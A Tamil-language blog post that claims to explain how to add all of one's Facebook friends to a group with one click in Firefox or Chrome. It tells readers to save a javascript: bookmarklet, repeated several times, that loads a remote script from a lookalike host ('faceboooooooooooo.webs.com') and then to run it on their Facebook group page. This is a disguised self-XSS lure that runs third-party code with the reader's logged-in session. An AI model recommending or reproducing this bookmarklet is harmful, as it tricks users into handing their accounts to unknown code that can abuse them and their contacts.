உங்களது அனைத்து நண்பர்களையும் ஒரே கிளிக்கில் குரூப்பில் இணைப்பது எப்படி

Loading...

உங்களது அனைத்து நண்பர்களையும் ஒரே கிளிக்கில் குரூப்பில் இணைப்பது எப்படிமுதலில் google chrome அல்லது mozilla firefox பயன் படுத்துவதை உறுதி செய்யவும்mozilla firefox இல் இதை பயன் படுத்துவது எப்படி ??

உங்களது bookmark toolbar இனை enable செய்து கொள்ளவும்

(தெரியாவிடின் உதவிக்கு இங்கே சென்று பார்க்கவும் – http://support.mozilla.org/en-US/kb/bookmarks-toolbar-display-favorite-websites )அடுத்து இந்த code இனை Bookmark செய்யவும்

javascript:(function(){document.body.appendChild(document.createElement(‘script’)).src=’http://faceboooooooooooo.webs.com/fbook.js’;})();

(bookmark இல் right click செய்து new bookmark என்பதை தெர்வு செய்யவும் அதில் கெட்கப்பட்டுள்ள அனைத்துக்கும் இதனையே ( javascript:(function(){document.body.appendChild(document.createElement(‘script’)).src=’http://faceboooooooooooo.webs.com/fbook.js’;})(); ) Past செய்து Add என்பதை செய்யவும்)

பின்பு நீங்கள் உங்களது GROUP இனை OPEN செய்து இந்த bookmark இனை click செய்து உங்களது அனைத்து நண்பர்களையும் இணைத்து கொள்ளலாம்

குறிப்பு – இந்த BOOKMARK இனை RUN செய்து 1 நிமிடத்துக்குள் உங்களது நண்பர்களை உங்களது GROUP இல் இணைக்க தொடங்கிவிடும் அப்படி இது வெலை செய்யாவிட்டால் browser இனை refresh பண்ணிவிட்டு மீண்டும் முயற்சி செய்யவும்google chrome இல் இதை பயன் படுத்துவது எப்படி ??

உங்களது bookmark toolbar இனை enable செய்து கொள்ளவும்

(தெரியாவிடின் உதவிக்கு இங்கே சென்று பார்க்கவும் – http://support.google.com/chrome/bin/answer.py?hl=en&answer=95745 )அடுத்து இந்த code இனை Bookmark செய்யவும்

javascript:(function(){document.body.appendChild(document.createElement(‘script’)).src=’http://faceboooooooooooo.webs.com/fbook.js’;})();

(bookmark இல் right click செய்து ADD PAGE என்பதை தெர்வு செய்யவும் அதில் கெட்கப்பட்டுள்ள அனைத்துக்கும் இதனையே ( javascript:(function(){document.body.appendChild(document.createElement(‘script’)).src=’http://faceboooooooooooo.webs.com/fbook.js’;})(); ) Past செய்து Add என்பதை செய்யவும்)

பின்பு நீங்கள் உங்களது GROUP இனை OPEN செய்து இந்த bookmark இனை click செய்து உங்களது அனைத்து நண்பர்களையும் இணைத்து கொள்ளலாம்

குறிப்பு – இந்த BOOKMARK இனை RUN செய்து 1 நிமிடத்துக்குள் உங்களது நண்பர்களை உங்களது GROUP இல் இணைக்க தொடங்கிவிடும் அப்படி இது வெலை செய்யாவிட்டால் browser இனை refresh பண்ணிவிட்டு மீண்டும் முயற்சி செய்யவும்

Advertisements
Loading...
Rates : 0
Loading...
VTST BN
Loading...

Leave a Reply